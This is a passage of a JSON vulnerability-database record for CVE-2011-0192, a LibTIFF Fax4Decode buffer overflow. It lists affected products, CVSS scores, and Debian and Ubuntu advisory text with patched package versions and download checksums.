            "model": "in motion blackberry enterprise server for novell groupwise sp3 hotfix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.01"
          },
          {
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.2"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6.2"
          },
          {
            "model": "in motion blackberry enterprise server for domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.0"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.9.1"
          },
          {
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "model": "hat enterprise linux workstation optional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "6"
          },
          {
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.1"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6.4"
          },
          {
            "model": "in motion blackberry enterprise server for exchange mr1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.2"
          },
          {
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.1.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "11.0"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.9.2"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "5.0"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6.1"
          },
          {
            "model": "ios",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "5"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.8"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "4.0"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.8"
          },
          {
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "0"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.3.3"
          },
          {
            "model": "alpha2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.5.7"
          },
          {
            "model": "communication server 1000e signaling server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "model": "in motion blackberry enterprise server for exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.4"
          },
          {
            "model": "in motion blackberry enterprise server for exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.2"
          },
          {
            "model": "linux -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "model": "aura system platform sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "13.1"
          },
          {
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "model": "hat enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5"
          },
          {
            "model": "linux lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.10"
          },
          {
            "model": "in motion blackberry enterprise server express for exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.1"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.7.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "13.0"
          },
          {
            "model": "in motion blackberry enterprise server mr4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.6"
          },
          {
            "model": "in motion blackberry enterprise server for domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.2"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.6.1"
          },
          {
            "model": "aura communication manager utility services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.2.9"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.5.6"
          },
          {
            "model": "beta5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "4.0"
          },
          {
            "model": "hat enterprise linux workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "6"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.04"
          },
          {
            "model": "enterprise linux desktop workstation client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "model": "ios beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.2"
          },
          {
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0.1"
          },
          {
            "model": "communication server 1000e signaling server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.5"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6.2"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.8.1"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "0"
          },
          {
            "model": "in motion blackberry enterprise server express for domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.0"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.1"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.7"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.8"
          },
          {
            "model": "beta1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "4.0"
          },
          {
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "in motion blackberry enterprise server express for domino mr1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.2"
          },
          {
            "model": "iq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6.1"
          },
          {
            "model": "communication server 1000m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.5"
          },
          {
            "model": "beta3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "4.0"
          },
          {
            "model": "in motion blackberry enterprise server for domino sp3 hotfix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.04"
          },
          {
            "model": "communication server 1000e signaling server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          },
          {
            "model": "in motion blackberry enterprise server for novell groupwise mr3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.1"
          },
          {
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0.1"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "5.0.3"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.0.3"
          },
          {
            "model": "iq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.1"
          },
          {
            "model": "hat enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "6"
          },
          {
            "model": "in motion blackberry enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.4"
          },
          {
            "model": "communication server 1000m signaling server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.5"
          },
          {
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "beta4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "4.0"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2.2"
          },
          {
            "model": "beta37",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.4"
          },
          {
            "model": "aura application server sip core",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "53002.1"
          },
          {
            "model": "tv",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.1"
          },
          {
            "model": "communication server 1000e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.5"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.2.2"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4"
          },
          {
            "model": "networks contivity secure ip services gateway sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "46004.0"
          },
          {
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.10"
          },
          {
            "model": "mac os server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6.7"
          },
          {
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "communication server 1000m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "46658"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201103-112"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-001352"
          },
          {
            "db": "NVD",
            "id": "CVE-2011-0192"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:apple:mac_os_x",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:apple:mac_os_x_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:apple:apple_tv",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:apple:iphone_os",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:apple:ipad",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:apple:iphone",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:apple:ipod_touch",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:apple:itunes",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:apple:safari",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux_desktop",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux_hpc_node",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux_workstation",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:rhel_desktop_workstation",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-001352"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Apple",
        "sources": [
          {
            "db": "BID",
            "id": "46658"
          },
          {
            "db": "PACKETSTORM",
            "id": "105737"
          },
          {
            "db": "PACKETSTORM",
            "id": "105736"
          }
        ],
        "trust": 0.5
      },
      "cve": "CVE-2011-0192",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2011-0192",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "VHN-48137",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2011-0192",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2011-0192",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201103-112",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-48137",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-48137"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201103-112"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-001352"
          },
          {
            "db": "NVD",
            "id": "CVE-2011-0192"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Buffer overflow in Fax4Decode in LibTIFF 3.9.4 and possibly other versions, as used in ImageIO in Apple iTunes before 10.2 on Windows and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TIFF Internet Fax image file that has been compressed using CCITT Group 4 encoding, related to the EXPAND2D macro in libtiff/tif_fax3.h.  NOTE: some of these details are obtained from third party information. plural Apple Product LIBTIFF Is libtiff/tif_fax3.h. libTIFF is prone to a buffer-overflow  vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. \nAn attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. \nNOTE: This BID was previously titled \u0027Apple iTunes libTIFF CCITT Group 4 Encoded TIFF Image Buffer Overflow Vulnerability\u0027 but has been changed to better reflect the affected library. \nNote (March 30, 2011): This issue has not been patched as expected. This library contains some command line tools for working with TIFF files. \n  This issue affects the Debian 5.0 Lenny package only. \n\nFor the oldstable distribution (lenny), these problems have been\nfixed in version 3.8.2-11.4. \n\nFor the stable distribution (squeeze), these problems have been\nfixed in version 3.9.4-5+squeeze1. \n\nFor the testing distribution, the first two problems have been fixed\nin version 3.9.4-8, the last problem will be fixed soon. \n\nFor the unstable distribution (sid), these problems have been fixed\nin version 3.9.4-9. \n\nWe recommend that you upgrade your tiff packages. ===========================================================\nUbuntu Security Notice USN-1085-2            March 15, 2011\ntiff regression\nhttps://launchpad.net/bugs/731540\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 8.04 LTS\nUbuntu 9.10\nUbuntu 10.04 LTS\nUbuntu 10.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  libtiff4                        3.7.4-1ubuntu3.10\n\nUbuntu 8.04 LTS:\n  libtiff4                        3.8.2-7ubuntu3.8\n\nUbuntu 9.10:\n  libtiff4                        3.8.2-13ubuntu0.5\n\nUbuntu 10.04 LTS:\n  libtiff4                        3.9.2-2ubuntu0.5\n\nUbuntu 10.10:\n  libtiff4                        3.9.4-2ubuntu0.2\n\nAfter a standard system update you need to restart your session to make\nall the necessary changes. \n\nDetails follow:\n\nUSN-1085-1 fixed vulnerabilities in the system TIFF library. The upstream\nfixes were incomplete and created problems for certain CCITTFAX4 files. \n\nWe apologize for the inconvenience. \n\nOriginal advisory details:\n\n Sauli Pahlman discovered that the TIFF library incorrectly handled invalid\n td_stripbytecount fields. If a user or automated system were tricked into\n opening a specially crafted TIFF image, a remote attacker could crash the\n application, leading to a denial of service. This issue only affected\n Ubuntu 10.04 LTS and 10.10. (CVE-2010-2482)\n \n Sauli Pahlman discovered that the TIFF library incorrectly handled TIFF\n files with an invalid combination of SamplesPerPixel and Photometric\n values. If a user or automated system were tricked into opening a specially\n crafted TIFF image, a remote attacker could crash the application, leading\n to a denial of service. This issue only affected Ubuntu 10.10. \n (CVE-2010-2482)\n \n Nicolae Ghimbovschi discovered that the TIFF library incorrectly handled\n invalid ReferenceBlackWhite values. If a user or automated system were\n tricked into opening a specially crafted TIFF image, a remote attacker\n could crash the application, leading to a denial of service. \n (CVE-2010-2595)\n \n Sauli Pahlman discovered that the TIFF library incorrectly handled certain\n default fields. If a user or automated system were tricked into opening a\n specially crafted TIFF image, a remote attacker could crash the\n application, leading to a denial of service. (CVE-2010-2597, CVE-2010-2598)\n \n It was discovered that the TIFF library incorrectly validated certain\n data types. If a user or automated system were tricked into opening a\n specially crafted TIFF image, a remote attacker could crash the\n application, leading to a denial of service. (CVE-2010-2630)\n \n It was discovered that the TIFF library incorrectly handled downsampled\n JPEG data. This issue only affected Ubuntu 10.04 LTS and 10.10. \n (CVE-2010-3087)\n \n It was discovered that the TIFF library incorrectly handled certain JPEG\n data. \n This issue only affected Ubuntu 6.06 LTS, 8.04 LTS and 9.10. \n (CVE-2011-0191)\n \n It was discovered that the TIFF library incorrectly handled certain TIFF\n FAX images. (CVE-2011-0191)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.10.diff.gz\n      Size/MD5:    24707 92ee677a20237cfdb17b5dcbe024fc81\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.10.dsc\n      Size/MD5:     1445 19186c480eda8ade1d4fd194a7e08bf6\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4.orig.tar.gz\n      Size/MD5:  1280113 02cf5c3820bda83b35bb35b45ae27005\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.10_amd64.deb\n      Size/MD5:   220784 7b8f336c5190b816fb92f498b30755c9\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.10_amd64.deb\n      Size/MD5:   283278 2633a7f81897814f7bddb303f6952b34\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.10_amd64.deb\n      Size/MD5:   488554 bd11ebd5ae319660ec0eff4f22b55268\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.10_amd64.deb\n      Size/MD5:    45210 2d75169ed1d84f4907d505780123691d\n    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.10_amd64.deb\n      Size/MD5:    50372 d606202ec431cee4d43658887b7c53f7\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.10_i386.deb\n      Size/MD5:   206424 d346905ce628f3b5afdfe1a4b5e46ee8\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.10_i386.deb\n      Size/MD5:   260146 f8a0af4bb2a87fab5833e8bea85b4179\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.10_i386.deb\n      Size/MD5:   462812 81f1884d1f83fbc7cf670233e79e464b\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.10_i386.deb\n      Size/MD5:    45144 047a98941044eb476ff601a50a94cb97\n    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.10_i386.deb\n      Size/MD5:    49650 0298317461310597a873c28bbe6c9c2d\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.10_powerpc.deb\n      Size/MD5:   240378 8f832fa2e7ca2122ea17b8440db407a3\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.10_powerpc.deb\n      Size/MD5:   289250 7118c8a2b9ee67fb759d89631b80ec33\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.10_powerpc.deb\n      Size/MD5:   477164 46d81e5cca275c4f9fa490bccf5e1b54\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.10_powerpc.deb\n      Size/MD5:    47366 8f493b29a1c6af1ede1ae20bb340542e\n    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.10_powerpc.deb\n      Size/MD5:    52018 9cbc82320c0fb9160a55d9e966935308\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.10_sparc.deb\n      Size/MD5:   209294 1c075ff5d8fe054cfbe59767156f2b12\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.10_sparc.deb\n      Size/MD5:   271226 083721bbf42b3a9c2ba0619725cdea1c\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.10_sparc.deb\n      Size/MD5:   467842 244140481e39cbae1caeea1cbc7242fb\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.10_sparc.deb\n      Size/MD5:    45072 0ecf1aa2519fd0f70a54e97299a9a2aa\n    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.10_sparc.deb\n      Size/MD5:    50206 1fd3434ab16f251802c05e69b2ec4172\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.8.diff.gz\n      Size/MD5:    23098 1ee89aac13034400cc5f65bc82350576\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.8.dsc\n      Size/MD5:     1534 db81aff18857a6a792e8e3d9f6419c25\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz\n      Size/MD5:  1333780 e6ec4ab957ef49d5aabc38b7a376910b\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_amd64.deb\n      Size/MD5:   186052 117b7fef507321d3b40f31e82121d65c\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_amd64.deb\n      Size/MD5:   583498 356ff0e0f3fa15764371a8d0ffbd2574\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_amd64.deb\n      Size/MD5:   132044 f21e514b5f9ffa5e083d48e3ff2876be\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_amd64.deb\n      Size/MD5:     5060 bd0be2af72fb9789ef27a5cf3445a960\n    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_amd64.deb\n      Size/MD5:    10482 a49a0b07d12a18248a56d1c64322687b\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_i386.deb\n      Size/MD5:   175314 d510325b149f2106114857e9cd1887a1\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_i386.deb\n      Size/MD5:   552824 044e167a1106988f710d4b26cd480c13\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_i386.deb\n      Size/MD5:   123468 8c41a5b4deb4daf59a27aa18bafc2a33\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_i386.deb\n      Size/MD5:     5044 221fabdeb10a45b0e39b30fcd9876d57\n    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_i386.deb\n      Size/MD5:     9934 139ed154385849ed4a76c21f14d1824c\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_lpia.deb\n      Size/MD5:   177010 f861eceecd6f08085a7e66038b28d148\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_lpia.deb\n      Size/MD5:   555294 27b3f40726cd5cf866dd80b5fb5f652d\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_lpia.deb\n      Size/MD5:   124582 a101756bd948bc2d526bbb3793655c46\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_lpia.deb\n      Size/MD5:     4916 0fde80306a67eb766b878040048003fa\n    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_lpia.deb\n      Size/MD5:     9976 36fdc7a9337f4a5391a5d951624775df\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_powerpc.deb\n      Size/MD5:   223488 04f35d447aa797b255c249719f467896\n    